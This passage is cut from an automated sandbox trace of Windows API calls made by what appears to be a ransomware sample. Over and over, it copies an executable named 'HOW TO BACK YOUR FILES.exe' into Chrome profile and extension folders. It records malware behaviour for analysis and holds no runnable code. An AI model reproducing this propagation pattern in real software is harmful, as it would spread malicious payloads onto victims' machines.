returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0111.190] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings" [0111.190] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.190] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.191] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.191] GetLastError () returned 0x0 [0111.191] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de9bbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de9bbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.192] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0111.192] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0111.192] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.192] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.193] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.193] GetLastError () returned 0x0 [0111.193] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.193] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d197fa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d197fa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.193] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage" [0111.194] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage" [0111.194] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.194] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.194] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.195] GetLastError () returned 0x0 [0111.195] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.195] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x83ede170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d1be100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d1be100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.195] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" [0111.195] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings" [0111.195] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.196] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.196] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.196] GetLastError () returned 0x0 [0111.197] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.197] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dec1d40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dec1d40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.197] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0111.197] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi" [0111.197] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.197] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.198] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.198] GetLastError () returned 0x0 [0111.198] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.198] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8642cdf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d1e4260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d1e4260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.199] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" [0111.199] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld" [0111.199] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.199] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.200] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.200] GetLastError () returned 0x0 [0111.200] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.200] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85096390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d20a3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d20a3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.201] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons" [0111.201] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons" [0111.201] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.201] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticons\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.201] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.202] GetLastError () returned 0x0 [0111.202] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.202] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIcons\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x96ec4eb0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d20a3c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d20a3c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.202] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0111.203] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0111.203] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.203] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.203] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.204] GetLastError () returned 0x0 [0111.204] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.204] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4dee7ea0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dee7ea0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.204] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0111.204] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm" [0111.204] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.205] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.205] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.205] GetLastError () returned 0x0 [0111.206] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.206] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8399f510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4df0e000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4df0e000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.206] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" [0111.206] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0" [0111.206] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.206] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.208] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.208] GetLastError () returned 0x0 [0111.209] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.209] FindFirstFileW (in: 